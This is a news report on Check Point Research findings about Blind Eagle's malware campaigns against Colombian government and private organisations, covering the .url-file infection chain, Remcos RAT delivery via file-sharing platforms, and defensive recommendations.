A new cyber-threat campaign targeting Colombian government institutions and organizations since November 2024 has been linked to the threat group Blind Eagle, also known as APT-C-36. The attackers have been distributing malicious .url files that mimic the effects of the recently patched CVE-2024-43451 vulnerability.
The vulnerability CVE-2024-43451, patched by Microsoft on November 12 2024, allowed attackers to extract NTLMv2 hashes, which could be used for authentication attacks.
While Blind Eagle’s .url variant does not exploit this vulnerability directly, it still triggers a WebDAV request when the file is interacted with in specific ways – such as right-clicking, deleting or dragging it. This action informs the attackers that the file has been downloaded. If the user clicks the file, it initiates the download of a second-stage payload via another WebDAV request, executing the malware.
Just six days after Microsoft issued the patch, Blind Eagle incorporated this new attack vector into its operations. The group primarily targeted Colombian judicial institutions, private organizations and other government agencies.
One of the largest observed campaigns, on December 19 2024, infected over 1600 victims. Given Blind Eagle’s historically selective targeting, this number is significant.
Delivery Methods and Malware Analysis
Blind Eagle has been known to distribute its malware through legitimate file-sharing platforms like Google Drive and Dropbox. According to a new advisory by Check Point Research (CPR), it has recently expanded to using Bitbucket and GitHub to host its payloads.
The attack chain includes the use of HeartCrypt, a packer-as-a-service, to protect a .NET RAT believed to be a variant of PureCrypter. The final stage payload is Remcos RAT, a remote access trojan.
In January 2025, a new wave of campaigns labeled “socialismo” and “miami” involved the distribution of malicious .url files via compromised Google Drive accounts. The malware executed a complex infection chain that resulted in data exfiltration and system compromise.
The group’s GitHub repository, frequently updated in the UTC-5 timezone, aligns with South American time zones, reinforcing suspicions about its origin.
Another campaign in December 2024, named “Parasio,” leveraged Bitbucket instead of GitHub to distribute the Remcos RAT payload. This campaign alone resulted in approximately 9000 infections over one week.
Read more on cybersecurity threats in Latin America: Mekotio Trojan Targets Latin American Banking Credentials
Past Phishing Campaigns and Data Exposure
CPR also discovered evidence of an additional phishing campaign run by Blind Eagle. In February 2025, the group mistakenly exposed an HTML file containing personally identifiable information (PII) from a phishing campaign that impersonated Colombian banks.
The dataset included 8075 valid entries, with credentials and ATM PINs among the compromised information. Several Colombian government email accounts were also among the targeted victims.
“Blind Eagle remains one of the most active and dangerous threat actors in Latin America, with a particular focus on Colombia’s public and private sectors,” CPR warned.
“A key factor in its success is its ability to exploit legitimate file-sharing platforms, including Google Drive, Dropbox, Bitbucket, and GitHub, allowing it to bypass traditional security measures and distribute malware stealthily.”
To counter this threat, organizations are advised to implement strict security policies, disable NTLM authentication where possible and monitor network activity for unusual WebDAV requests.
